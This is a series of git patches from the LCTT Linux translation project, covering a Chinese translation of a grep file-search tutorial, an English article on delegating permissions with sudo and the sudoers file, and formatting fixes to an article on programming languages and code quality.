`Stretch` , `STRETCH` , `StReTcH` etc., hence, to perform case-insensitive search. +#### 大小写不敏感的搜索 +默认情况下搜索hi大小写敏感的,也就是说当搜索字符串 `stretch` 时只会包含大小写一致内容的文件. +通过使用 grep 的 `-i` 选项,grep 命令还会列出所有包含 `Stretch` , `STRETCH` , `StReTcH` 等内容的文件,也就是说进行的是大小写不敏感的搜索. ```shell # grep -Ril stretch /etc/* @@ -107,8 +108,8 @@ All searches are by default case sensitive which means that any search for a str /etc/os-release ``` -#### Include or Exclude specific files names from search -Using `grep` command it is also possible to include only specific files as part of the search. For example we only would like to search for a specific text/string within configuration files with extension `.conf` . The next example will find all files with extension `.conf` within `/etc` directory containing string `bash` : +#### 搜索是包含/排除指定文件 +`grep` 命令也可以只在指定文件中进行搜索. 比如,我们可以只在配置文件(扩展名为`.conf`)中搜索指定的文本/字符串. 下面这个例子就会在 `/etc` 目录中搜索带字符串 `bash` 且所有扩展名为 `.conf` 的文件: ```shell # grep -Ril bash /etc/*.conf @@ -117,7 +118,7 @@ OR /etc/adduser.conf ``` -Similarly, using `--exclude` option we can exclude any specific filenames: +类似的, 也可以使用 `--exclude` 来排除特定的文件: ```shell # grep -Ril --exclude=\*.conf bash /etc/* @@ -144,8 +145,9 @@ Similarly, using `--exclude` option we can exclude any specific filenames: /etc/skel/.bash_logout ``` -#### Exclude specific Directories from search -Same as with files grep can also exclude specific directories from the search. Use `--exclude-dir` option to exclude directory from search. The following search example will find all files containing string `stretch` within `/etc` directory and exclude `/etc/grub.d` from search: +#### 搜索时排除指定目录 +跟文件一样,grep 也能在搜索时排除指定目录. 使用 `--exclude-dir` 选项就行. +下面这个例子会搜索 `/etc` 目录中搜有包含字符串 `stretch` 的文件,但不包括 `/etc/grub.d` 目录下的文件: ```shell # grep --exclude-dir=/etc/grub.d -Rwl stretch /etc/* @@ -154,16 +156,17 @@ Same as with files grep can also exclude specific directories from the search. U /etc/os-release ``` -#### Display a line number containing searched string -By using `-n` option grep will also provide an information regarding a line number where the specific string was found: +#### 显示包含搜索字符串的行号 +`-n` 选项还会显示指定字符串所在行的行号: ```shell # grep -Rni bash /etc/*.conf /etc/adduser.conf:6:DSHELL=/bin/bash ``` -#### Find all files not containing a specific string -The last example will use `-v` option to list all files NOT containing a specific keyword. For example the following search will list all files within `/etc/` directory which do not contain string `stretch` : +#### 寻找不包含指定字符串的文件 +最后这个例子使用 `-v` 来列出所有 *不* 包含指定字符串的文件. +例如下面命令会搜索 `/etc` 目录中不包含 `stretch` 的所有文件: ```shell # grep -Rlv stretch /etc/* From 05bf1048b2b032bac519880665bbd25d3e0f54a6 Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 6 Dec 2017 19:39:15 +0800 Subject: [PATCH 0350/1627] reformat --- ...with a specific text using Linux shell .md | 26 +++++++++---------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/sources/tech/20171130 How to find all files with a specific text using Linux shell .md b/sources/tech/20171130 How to find all files with a specific text using Linux shell .md index 81938b79fc..41b02fc989 100644 --- a/sources/tech/20171130 How to find all files with a specific text using Linux shell .md +++ b/sources/tech/20171130 How to find all files with a specific text using Linux shell .md @@ -1,8 +1,8 @@ -如何在Linux shell中找出所有包含指定文本的文件 +如何在 Linux shell 中找出所有包含指定文本的文件 ------ ### 目标 -本文提供一些关于如何搜索出指定目录或整个文件系统中那些包含指定单词或字符串的文件. +本文提供一些关于如何搜索出指定目录或整个文件系统中那些包含指定单词或字符串的文件。 ### 难度 @@ -25,11 +25,11 @@ /etc/os-release:PRETTY_NAME="Debian GNU/Linux 9 (stretch)" /etc/os-release:VERSION="9 (stretch)" ``` -grep 的 `-s` 选项会在发现不能存在或者不能读取的文件时抑制报错信息. 结果现实除了文件名外还有包含请求字符串的行也被一起输出了. +grep 的 `-s` 选项会在发现不能存在或者不能读取的文件时抑制报错信息。结果现实除了文件名外还有包含请求字符串的行也被一起输出了。 #### 递归地搜索包含指定字符串的文件 -上面案例中忽略了所有的子目录. 所谓递归搜索就是指同时搜索所有的子目录. +上面案例中忽略了所有的子目录。所谓递归搜索就是指同时搜索所有的子目录。 下面的命令会在 `/etc/` 及其子目录中搜索包含 `stretch` 字符串的文件: ```shell @@ -67,7 +67,7 @@ grep 的 `-s` 选项会在发现不能存在或者不能读取的文件时抑制 ``` #### 搜索所有包含特定单词的文件 -上面 `grep` 命令的案例中列出的是所有包含字符串 `stretch` 的文件. 也就是说包含 `stretches` , `stretched` 等内容的行也会被显示. 使用 grep 的 `-w` 选项会只显示包含特定单词的行: +上面 `grep` 命令的案例中列出的是所有包含字符串 `stretch` 的文件。也就是说包含 `stretches` , `stretched` 等内容的行也会被显示。 使用 grep 的 `-w` 选项会只显示包含特定单词的行: ```shell # grep -Rw stretch /etc/* @@ -85,7 +85,7 @@ grep 的 `-s` 选项会在发现不能存在或者不能读取的文件时抑制 ``` #### 显示包含特定文本文件的文件名 -上面的命令都会产生多余的输出. 下一个案例则会递归地搜索 `etc` 目录中包含 `stretch` 的文件并只输出文件名: +上面的命令都会产生多余的输出。下一个案例则会递归地搜索 `etc` 目录中包含 `stretch` 的文件并只输出文件名: ```shell # grep -Rl stretch /etc/* @@ -96,8 +96,8 @@ grep 的 `-s` 选项会在发现不能存在或者不能读取的文件时抑制 ``` #### 大小写不敏感的搜索 -默认情况下搜索hi大小写敏感的,也就是说当搜索字符串 `stretch` 时只会包含大小写一致内容的文件. -通过使用 grep 的 `-i` 选项,grep 命令还会列出所有包含 `Stretch` , `STRETCH` , `StReTcH` 等内容的文件,也就是说进行的是大小写不敏感的搜索. +默认情况下搜索 hi 大小写敏感的,也就是说当搜索字符串 `stretch` 时只会包含大小写一致内容的文件。 +通过使用 grep 的 `-i` 选项,grep 命令还会列出所有包含 `Stretch` , `STRETCH` , `StReTcH` 等内容的文件,也就是说进行的是大小写不敏感的搜索。 ```shell # grep -Ril stretch /etc/* @@ -109,7 +109,7 @@ grep 的 `-s` 选项会在发现不能存在或者不能读取的文件时抑制 ``` #### 搜索是包含/排除指定文件 -`grep` 命令也可以只在指定文件中进行搜索. 比如,我们可以只在配置文件(扩展名为`.conf`)中搜索指定的文本/字符串. 下面这个例子就会在 `/etc` 目录中搜索带字符串 `bash` 且所有扩展名为 `.conf` 的文件: +`grep` 命令也可以只在指定文件中进行搜索。比如,我们可以只在配置文件(扩展名为`.conf`)中搜索指定的文本/字符串。 下面这个例子就会在 `/etc` 目录中搜索带字符串 `bash` 且所有扩展名为 `.conf` 的文件: ```shell # grep -Ril bash /etc/*.conf @@ -118,7 +118,7 @@ OR /etc/adduser.conf ``` -类似的, 也可以使用 `--exclude` 来排除特定的文件: +类似的,也可以使用 `--exclude` 来排除特定的文件: ```shell # grep -Ril --exclude=\*.conf bash /etc/* @@ -146,7 +146,7 @@ OR ``` #### 搜索时排除指定目录 -跟文件一样,grep 也能在搜索时排除指定目录. 使用 `--exclude-dir` 选项就行. +跟文件一样,grep 也能在搜索时排除指定目录。 使用 `--exclude-dir` 选项就行。 下面这个例子会搜索 `/etc` 目录中搜有包含字符串 `stretch` 的文件,但不包括 `/etc/grub.d` 目录下的文件: ```shell @@ -165,7 +165,7 @@ OR ``` #### 寻找不包含指定字符串的文件 -最后这个例子使用 `-v` 来列出所有 *不* 包含指定字符串的文件. +最后这个例子使用 `-v` 来列出所有 *不* 包含指定字符串的文件。 例如下面命令会搜索 `/etc` 目录中不包含 `stretch` 的所有文件: ```shell @@ -178,7 +178,7 @@ via: https://linuxconfig.org/how-to-find-all-files-with-a-specific-text-using-li 作者:[Lubos Rendek][a] 译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) +校对:[校对者 ID](https://github.com/校对者 ID) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 772f3f418786300abf49a2f89391ab9f21d6aa95 Mon Sep 17 00:00:00 2001 From: qhwdw Date: Wed, 6 Dec 2017 19:46:58 +0800 Subject: [PATCH 0351/1627] Translating by qhwdw --- sources/tech/20171005 Reasons Kubernetes is cool.md | 1 + sources/tech/20171203 Best Network Monitoring Tools For Linux.md | 1 + 2 files changed, 2 insertions(+) diff --git a/sources/tech/20171005 Reasons Kubernetes is cool.md b/sources/tech/20171005 Reasons Kubernetes is cool.md index a9d10b9cdb..e1e63e77e8 100644 --- a/sources/tech/20171005 Reasons Kubernetes is cool.md +++ b/sources/tech/20171005 Reasons Kubernetes is cool.md @@ -1,3 +1,4 @@ +Translating by qhwdw Reasons Kubernetes is cool ============================================================ diff --git a/sources/tech/20171203 Best Network Monitoring Tools For Linux.md b/sources/tech/20171203 Best Network Monitoring Tools For Linux.md index aec39b9822..d53e4e0534 100644 --- a/sources/tech/20171203 Best Network Monitoring Tools For Linux.md +++ b/sources/tech/20171203 Best Network Monitoring Tools For Linux.md @@ -1,3 +1,4 @@ +Translating by qhwdw Best Network Monitoring Tools For Linux =============================== From 15da7e58d9374ee09679e0445d62817dca010b88 Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 6 Dec 2017 19:54:17 +0800 Subject: [PATCH 0352/1627] =?UTF-8?q?update=20at=202017=E5=B9=B4=2012?= =?UTF-8?q?=E6=9C=88=2006=E6=97=A5=20=E6=98=9F=E6=9C=9F=E4=B8=89=2019:54:1?= =?UTF-8?q?7=20CST?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...w to find all files with a specific text using Linux shell .md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {sources => translated}/tech/20171130 How to find all files with a specific text using Linux shell .md (100%) diff --git a/sources/tech/20171130 How to find all files with a specific text using Linux shell .md b/translated/tech/20171130 How to find all files with a specific text using Linux shell .md similarity index 100% rename from sources/tech/20171130 How to find all files with a specific text using Linux shell .md rename to translated/tech/20171130 How to find all files with a specific text using Linux shell .md From 297bddfde76917b37ed614afb498cf4ac0cf06fb Mon Sep 17 00:00:00 2001 From: imquanquan Date: Wed, 6 Dec 2017 20:55:41 +0800 Subject: [PATCH 0353/1627] translating --- sources/tech/20171201 Fedora Classroom Session_Ansible 101.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171201 Fedora Classroom Session_Ansible 101.md b/sources/tech/20171201 Fedora Classroom Session_Ansible 101.md index a74b196663..9e41edb393 100644 --- a/sources/tech/20171201 Fedora Classroom Session_Ansible 101.md +++ b/sources/tech/20171201 Fedora Classroom Session_Ansible 101.md @@ -1,3 +1,5 @@ +translating---geekpi + ### [Fedora Classroom Session: Ansible 101][2] ### By Sachin S Kamath From b44d24ca6bd4a55839e4030c4a61333d0bb9f751 Mon Sep 17 00:00:00 2001 From: imquanquan Date: Wed, 6 Dec 2017 20:57:08 +0800 Subject: [PATCH 0354/1627] translating --- sources/tech/20171201 Fedora Classroom Session_Ansible 101.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/sources/tech/20171201 Fedora Classroom Session_Ansible 101.md b/sources/tech/20171201 Fedora Classroom Session_Ansible 101.md index 9e41edb393..628cd79497 100644 --- a/sources/tech/20171201 Fedora Classroom Session_Ansible 101.md +++ b/sources/tech/20171201 Fedora Classroom Session_Ansible 101.md @@ -1,4 +1,4 @@ -translating---geekpi +translating---imquanquan ### [Fedora Classroom Session: Ansible 101][2] From 3d25b5016c700f367ccd7da6a468d3396e033d1d Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 6 Dec 2017 21:38:27 +0800 Subject: [PATCH 0355/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Using=20sudo=20?= =?UTF-8?q?to=20delegate=20permissions=20in=20Linux?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...g sudo to delegate permissions in Linux.md | 229 ++++++++++++++++++ 1 file changed, 229 insertions(+) create mode 100644 sources/tech/20171205 Using sudo to delegate permissions in Linux.md diff --git a/sources/tech/20171205 Using sudo to delegate permissions in Linux.md b/sources/tech/20171205 Using sudo to delegate permissions in Linux.md new file mode 100644 index 0000000000..46a807c7a4 --- /dev/null +++ b/sources/tech/20171205 Using sudo to delegate permissions in Linux.md @@ -0,0 +1,229 @@ +translating by lujun9972 +Using sudo to delegate permissions in Linux +====== +I recently wrote a short Bash program to copy MP3 files from a USB thumb drive on one network host to another network host. The files are copied to a specific directory on the server that I run for a volunteer organization, from where the files can be downloaded and played. + +My program does a few other things, such as changing the name of the files before they are copied so they are automatically sorted by date on the webpage. It also deletes all the files on the USB drive after verifying that the transfer completed correctly. This nice little program has a few options, such as -h to display help, -t for test mode, and a couple of others. + +My program, as wonderful as it is, must run as root to perform its primary functions. Unfortunately, this organization has only a few people who have any interest in administering our audio and computer systems, which puts me in the position of finding semi-technical people and training them to log into the computer used to perform the transfer and run this little program. + +It is not that I cannot run the program myself, but for various reasons, including travel and illness, I am not always there. Even when I am present, as the "lazy sysadmin," I like to have others do my work for me. So, I write scripts to automate those tasks and use sudo to anoint a couple of users to run the scripts. Many Linux commands require the user to be root in order to run. This protects the system against accidental damage, such as that caused by my own stupidity, and intentional damage by a user with malicious intent. + +### Do that sudo that you do so well + +The sudo program is a handy tool that allows me as a sysadmin with root access to delegate responsibility for all or a few administrative tasks to other users of the computer. It allows me to perform that delegation without compromising the root password, thus maintaining a high level of security on the host. + +Let's assume, for example, that I have given regular user, "ruser," access to my Bash program, "myprog," which must be run as root to perform parts of its functions. First, the user logs in as ruser with their own password, then uses the following command to run myprog. + +``` + sudo myprog +``` + +I find it helpful to have the log of each command run by sudo for training. I can see who did what and whether they entered the command correctly. + +I have done this to delegate authority to myself and one other user to run a single program; however, sudo can be used to do so much more. It can allow the sysadmin to delegate authority for managing network functions or specific services to a single person or to a group of trusted users. It allows these functions to be delegated while protecting the security of the root password. + +### Configuring the sudoers file + +As a sysadmin, I can use the /etc/sudoers file to allow users or groups of users access to a single command, defined groups of commands, or all commands. This flexibility is key to both the power and the simplicity of using sudo for delegation. + +I found the sudoers file very confusing at first, so below I have copied and deconstructed the entire sudoers file from the host on which I am using it. Hopefully it won't be quite so obscure for you by the time you get through this analysis. Incidentally, I've found that the default configuration files in Red Hat-based distributions tend to have lots of comments and examples to provide guidance, which makes things easier, with less online searching required. + +Do not use your standard editor to modify the sudoers file. Use the visudo command because it is designed to enable any changes as soon as the file is saved and you exit the editor. It is possible to use editors besides Vi in the same way as visudo. + +Let's start analyzing this file at the beginning with a couple types of aliases. + +### Host aliases + +The host aliases section is used to create groups of hosts on which commands or command aliases can be used to provide access. The basic idea is that this single file will be maintained for all hosts in an organization and copied to /etc of each host. Some hosts, such as servers, can thus be configured as a group to give some users access to specific commands, such as the ability to start and stop services like HTTPD, DNS, and networking; to mount filesystems; and so on. + +IP addresses can be used instead of host names in the host aliases. + +``` +## Sudoers allows particular users to run various commands as +## the root user, without needing the root password. +## +## Examples are provided at the bottom of the file for collections +## of related commands, which can then be delegated out to particular +## users or groups. +## +## This file must be edited with the 'visudo' command. + +## Host Aliases +## Groups of machines. You may prefer to use hostnames (perhaps using +## wildcards for entire domains) or IP addresses instead. +# Host_Alias FILESERVERS = fs1, fs2 +# Host_Alias MAILSERVERS = smtp, smtp2 + +## User Aliases +## These aren't often necessary, as you can use regular groups +## (ie, from files, LDAP, NIS, etc) in this file - just use %groupname +## rather than USERALIAS +# User_Alias ADMINS = jsmith, mikem +User_Alias AUDIO = dboth, ruser + +## Command Aliases +## These are groups of related commands... + +## Networking +# Cmnd_Alias NETWORKING = /sbin/route, /sbin/ifconfig, + /bin/ping, /sbin/dhclient, /usr/bin/net, /sbin/iptables, +/usr/bin/rfcomm, /usr/bin/wvdial, /sbin/iwconfig, /sbin/mii-tool + +## Installation and management of software +# Cmnd_Alias SOFTWARE = /bin/rpm, /usr/bin/up2date, /usr/bin/yum + +## Services +# Cmnd_Alias SERVICES = /sbin/service, /sbin/chkconfig + +## Updating the locate database +# Cmnd_Alias LOCATE = /usr/bin/updatedb + +## Storage +# Cmnd_Alias STORAGE = /sbin/fdisk, /sbin/sfdisk, /sbin/parted, /sbin/partprobe, /bin/mount, /bin/umount + +## Delegating permissions +# Cmnd_Alias DELEGATING = /usr/sbin/visudo, /bin/chown, /bin/chmod, /bin/chgrp + +## Processes +# Cmnd_Alias PROCESSES = /bin/nice, /bin/kill, /usr/bin/kill, /usr/bin/killall + +## Drivers +# Cmnd_Alias DRIVERS = /sbin/modprobe + +# Defaults specification + +# +# Refuse to run if unable to disable echo on the tty. +# +Defaults !visiblepw + +Defaults env_reset +Defaults env_keep = "COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS" +Defaults env_keep += "MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE" +Defaults env_keep += "LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES" +Defaults env_keep += "LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE" +Defaults env_keep += "LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY" + +Defaults secure_path = /sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin + +## Next comes the main part: which users can run what software on +## which machines (the sudoers file can be shared between multiple +## systems). +## Syntax: +## +## user MACHINE=COMMANDS +## +## The COMMANDS section may have other options added to it. +## +## Allow root to run any commands anywhere +root ALL=(ALL) ALL + +## Allows members of the 'sys' group to run networking, software, +## service management apps and more. +# %sys ALL = NETWORKING, SOFTWARE, SERVICES, STORAGE, DELEGATING, PROCESSES, LOCATE, DRIVERS + +## Allows people in group wheel to run all commands +%wheel ALL=(ALL) ALL + +## Same thing without a password +# %wheel ALL=(ALL) NOPASSWD: ALL + +## Allows members of the users group to mount and unmount the +## cdrom as root +# %users ALL=/sbin/mount /mnt/cdrom, /sbin/umount /mnt/cdrom + +## Allows members of the users group to shutdown this system +# %users localhost=/sbin/shutdown -h now + +## Read drop-in files from /etc/sudoers.d (the # here does not mean a comment) +#includedir /etc/sudoers.d + +################################################################################ +# Added by David Both, 11/04/2017 to provide limited access to myprog # +################################################################################ +# +AUDIO guest1=/usr/local/bin/myprog +``` + +### User aliases + +The user alias configuration allows root to sort users into aliased groups so that an entire group can have access to certain root capabilities. This is the section to which I have added the line User_Alias AUDIO = dboth, ruser, which defines the alias AUDIO and assigns two users to that alias. + +It is possible, as stated in the sudoers file, to simply use groups defined in the /etc/groups file instead of aliases. If you already have a group defined there that meets your needs, such as "audio," use that group name preceded by a % sign like so: %audio when assigning commands that will be made available to groups later in the sudoers file. + +### Command aliases + +Further down in the sudoers file is a command aliases section. These aliases are lists of related commands, such as networking commands or commands required to install updates or new RPM packages. These aliases allow the sysadmin to easily permit access to groups of commands. + +A number of aliases are already set up in this section that make it easy to delegate access to specific types of commands. + +### Environment defaults + +The next section sets some default environment variables. The item that is most interesting in this section is the !visiblepw line, which prevents sudo from running if the user environment is set to show the password. This is a security precaution that should not be overridden. + +### Command section + +The command section is the main part of the sudoers file. Everything you need to do can be done without all the aliases by adding enough entries here. The aliases just make it a whole lot easier. + +This section uses the aliases you've already defined to tell sudo who can do what on which hosts. The examples are self-explanatory once you understand the syntax in this section. Let's look at the syntax that we find in the command section. + +``` +ruser ALL=(ALL) ALL +``` + +This is a generic entry for our user, ruser. The first ALL in the line indicates that this rule applies on all hosts. The second ALL allows ruser to run commands as any other user. By default, commands are run as root user, but ruser can specify on the sudo command line that a program be run as any other user. The last ALL means that ruser can run all commands without restriction. This would effectively make ruser root. + +Note that there is an entry for root, as shown below. This allows root to have all-encompassing access to all commands on all hosts. + +``` +root ALL=(ALL) ALL +``` + +To try this out, I commented out the line and, as root, tried to run chown without sudo. That did work—much to my surprise. Then I used sudo chown and that failed with the message, "Root is not in the sudoers file. This incident will be reported." This means that root can run everything as root, but nothing when using the sudo command. This would prevent root from running commands as other users via the sudo command, but root has plenty of ways around that restriction. + +The code below is the one I added to control access to myprog. It specifies that users who are listed in the AUDIO group, as defined near the top of the sudoers file, have access to only one program, myprog, on one host, guest1. + +``` +AUDIO guest1=/usr/local/bin/myprog +``` + +Note that the syntax of the line above specifies only the host on which this access is to be allowed and the program. It does not specify that the user may run the program as any other user. + +### Bypassing passwords + +You can also use NOPASSWORD to allow the users specified in the group AUDIO to run myprog without the need for entering their passwords. Here's how: + +``` +AUDIO guest1=NOPASSWORD : /usr/local/bin/myprog +``` + +I did not do this for my program, because I believe that users with sudo access must stop and think about what they are doing, and this may help a bit with that. I used the entry for my little program as an example. + +### wheel + +The wheel specification in the command section of the sudoers file, as shown below, allows all users in the "wheel" group to run all commands on any host. The wheel group is defined in the /etc/group file, and users must be added to the group there for this to work. The % sign preceding the group name means that sudo should look for that group in the /etc/group file. + +``` +%wheel ALL = (ALL) ALL +``` + +This is a good way to delegate full root access to multiple users without providing the root password. Just adding a user to the wheel group gives them access to full root powers. It also provides a means to monitor their activities via the log entries created by sudo. Some distributions, such as Ubuntu, add users' IDs to the wheel group in /etc/group, which allows them to use the sudo command for all privileged commands. + +### Final thoughts + +I have used sudo here for a very limited objective—providing one or two users with access to a single command. I accomplished this with two lines (if you ignore my own comments). Delegating authority to perform certain tasks to users who do not have root access is simple and can save you, as a sysadmin, a good deal of time. It also generates log entries that can help detect problems. + +The sudoers file offers a plethora of capabilities and options for configuration. Check the man files for sudo and sudoers for the down-and-dirty details. + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/12/using-sudo-delegate + +作者:[David Both][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/dboth From 66615466074354727ff6601267a308c0e582ce1f Mon Sep 17 00:00:00 2001 From: Snowden Fu Date: Wed, 6 Dec 2017 21:40:43 +0800 Subject: [PATCH 0356/1627] update to latest --- ...ng Languages and Code Quality in GitHub.md | 38 +++++++++---------- 1 file changed, 19 insertions(+), 19 deletions(-) diff --git a/sources/tech/20171007 A Large-Scale Study of Programming Languages and Code Quality in GitHub.md b/sources/tech/20171007 A Large-Scale Study of Programming Languages and Code Quality in GitHub.md index 22986eaa19..2845ca549a 100644 --- a/sources/tech/20171007 A Large-Scale Study of Programming Languages and Code Quality in GitHub.md +++ b/sources/tech/20171007 A Large-Scale Study of Programming Languages and Code Quality in GitHub.md @@ -35,7 +35,7 @@ Our language and project data was extracted from the  _GitHub Archive_ , a data **Identifying top languages.** We aggregate projects based on their primary language. Then we select the languages with the most projects for further analysis, as shown in [Table 1][48]. A given project can use many languages; assigning a single language to it is difficult. Github Archive stores information gathered from GitHub Linguist which measures the language distribution of a project repository using the source file extensions. The language with the maximum number of source files is assigned as the  _primary language_  of the project. - [![t1.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/t1.jpg)][49] + [![t1.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/t1.jpg)][49] **Table 1\. Top 3 projects in each language.** **Retrieving popular projects.** For each selected language, we filter the project repositories written primarily in that language by its popularity based on the associated number of  _stars._ This number indicates how many people have actively expressed interest in the project, and is a reasonable proxy for its popularity. Thus, the top 3 projects in C are  _linux, git_ , and  _php-src_ ; and for C++ they are  _node-webkit, phantomjs_ , and  _mongo_ ; and for `Java` they are  _storm, elasticsearch_ , and  _ActionBarSherlock._  In total, we select the top 50 projects in each language. @@ -46,7 +46,7 @@ To ensure that these projects have a sufficient development history, we drop the [Table 2][51] summarizes our data set. Since a project may use multiple languages, the second column of the table shows the total number of projects that use a certain language at some capacity. We further exclude some languages from a project that have fewer than 20 commits in that language, where 20 is the first quartile value of the total number of commits per project per language. For example, we find 220 projects that use more than 20 commits in C. This ensures sufficient activity for each language–project pair. - [![t2.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/t2.jpg)][52] + [![t2.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/t2.jpg)][52] **Table 2\. Study subjects.** In summary, we study 728 projects developed in 17 languages with 18 years of history. This includes 29,000 different developers, 1.57 million commits, and 564,625 bug fix commits. @@ -56,14 +56,14 @@ In summary, we study 728 projects developed in 17 languages with 18 years of his We define language classes based on several properties of the language thought to influence language quality,[7][9], [8][10], [12][11] as shown in [Table 3][53]. The  _Programming Paradigm_  indicates whether the project is written in an imperative procedural, imperative scripting, or functional language. In the rest of the paper, we use the terms procedural and scripting to indicate imperative procedural and imperative scripting respectively. - [![t3.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/t3.jpg)][54] + [![t3.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/t3.jpg)][54] **Table 3\. Different types of language classes.** _Type Checking_  indicates static or dynamic typing. In statically typed languages, type checking occurs at compile time, and variable names are bound to a value and to a type. In addition, expressions (including variables) are classified by types that correspond to the values they might take on at run-time. In dynamically typed languages, type checking occurs at run-time. Hence, in the latter, it is possible to bind a variable name to objects of different types in the same program. _Implicit Type Conversion_  allows access of an operand of type T1 as a different type T2, without an explicit conversion. Such implicit conversion may introduce type-confusion in some cases, especially when it presents an operand of specific type T1, as an instance of a different type T2\. Since not all implicit type conversions are immediately a problem, we operationalize our definition by showing examples of the implicit type confusion that can happen in all the languages we identified as allowing it. For example, in languages like `Perl, JavaScript`, and `CoffeeScript` adding a string to a number is permissible (e.g., "5" + 2 yields "52"). The same operation yields 7 in `Php`. Such an operation is not permitted in languages such as `Java` and `Python` as they do not allow implicit conversion. In C and C++ coercion of data types can result in unintended results, for example, `int x; float y; y=3.5; x=y`; is legal C code, and results in different values for x and y, which, depending on intent, may be a problem downstream.[a][12] In `Objective-C` the data type  _id_  is a generic object pointer, which can be used with an object of any data type, regardless of the class.[b][13] The flexibility that such a generic data type provides can lead to implicit type conversion and also have unintended consequences.[c][14]Hence, we classify a language based on whether its compiler  _allows_  or  _disallows_  the implicit type conversion as above; the latter explicitly detects type confusion and reports it. -Disallowing implicit type conversion could result from static type inference within a compiler (e.g., with `Java`), using a type-inference algorithm such as Hindley[10][15] and Milner,[17][16] or at run-time using a dynamic type checker. In contrast, a type-confusion can occur silently because it is either undetected or is unreported. Either way, implicitly allowing type conversion provides flexibility but may eventually cause errors that are difficult to localize. To abbreviate, we refer to languages allowing implicit type conversion as  _implicit_  and those that disallow it as  _explicit._ +Disallowing implicit type conversion could result from static type inference within a compiler (e.g., with `Java`), using a type-inference algorithm such as Hindley[10][15] and Milner,[17][16] or at run-time using a dynamic type checker. In contrast, a type-confusion can occur silently because it is either undetected or is unreported. Either way, implicitly allowing type conversion provides flexibility but may eventually cause errors that are difficult to localize. To abbreviate, we refer to languages allowing implicit type conversion as  _implicit_  and those that disallow it as  _explicit._ _Memory Class_  indicates whether the language requires developers to manage memory. We treat `Objective-C` as unmanaged, in spite of it following a hybrid model, because we observe many memory errors in its codebase, as discussed in RQ4 in Section 3. @@ -76,7 +76,7 @@ We classify the studied projects into different domains based on their features We detect 30 distinct domains, that is, topics, and estimate the probability that each project belonging to each domain. Since these auto-detected domains include several project-specific keywords, for example, facebook, it is difficult to identify the underlying common functions. In order to assign a meaningful name to each domain, we manually inspect each of the 30 domains to identify projectname-independent, domain-identifying keywords. We manually rename all of the 30 auto-detected domains and find that the majority of the projects fall under six domains: Application, Database, CodeAnalyzer, Middleware, Library, and Framework. We also find that some projects do not fall under any of the above domains and so we assign them to a catchall domain labeled as  _Other_ . This classification of projects into domains was subsequently checked and confirmed by another member of our research group. [Table 4][57] summarizes the identified domains resulting from this process. - [![t4.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/t4.jpg)][58] + [![t4.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/t4.jpg)][58] **Table 4\. Characteristics of domains.** ![*](http://dl.acm.org/images/bullet.gif) @@ -86,7 +86,7 @@ While fixing software bugs, developers often leave important information in the First, we categorize the bugs based on their  _Cause_  and  _Impact. Causes_  are further classified into disjoint subcategories of errors: Algorithmic, Concurrency, Memory, generic Programming, and Unknown. The bug  _Impact_  is also classified into four disjoint subcategories: Security, Performance, Failure, and Other unknown categories. Thus, each bug-fix commit also has an induced Cause and an Impact type. [Table 5][59] shows the description of each bug category. This classification is performed in two phases: - [![t5.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/t5.jpg)][60] + [![t5.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/t5.jpg)][60] **Table 5\. Categories of bugs and their distribution in the whole dataset.** **(1) Keyword search.** We randomly choose 10% of the bug-fix messages and use a keyword based search technique to automatically categorize them as potential bug types. We use this annotation, separately, for both Cause and Impact types. We chose a restrictive set of keywords and phrases, as shown in [Table 5][61]. Such a restrictive set of keywords and phrases helps reduce false positives. @@ -118,7 +118,7 @@ We begin with a straightforward question that directly addresses the core of wha We use a regression model to compare the impact of each language on the number of defects with the average impact of all languages, against defect fixing commits (see [Table 6][64]). - [![t6.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/t6.jpg)][65] + [![t6.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/t6.jpg)][65] **Table 6\. Some languages induce fewer defects than other languages.** We include some variables as controls for factors that will clearly influence the response. Project age is included as older projects will generally have a greater number of defect fixes. Trivially, the number of commits to a project will also impact the response. Additionally, the number of developers who touch a project and the raw size of the project are both expected to grow with project activity. @@ -127,11 +127,11 @@ The sign and magnitude of the estimated coefficients in the above model relates One should take care not to overestimate the impact of language on defects. While the observed relationships are statistically significant, the effects are quite small. Analysis of deviance reveals that language accounts for less than 1% of the total explained deviance. - [![ut1.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/ut1.jpg)][66] + [![ut1.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/ut1.jpg)][66] 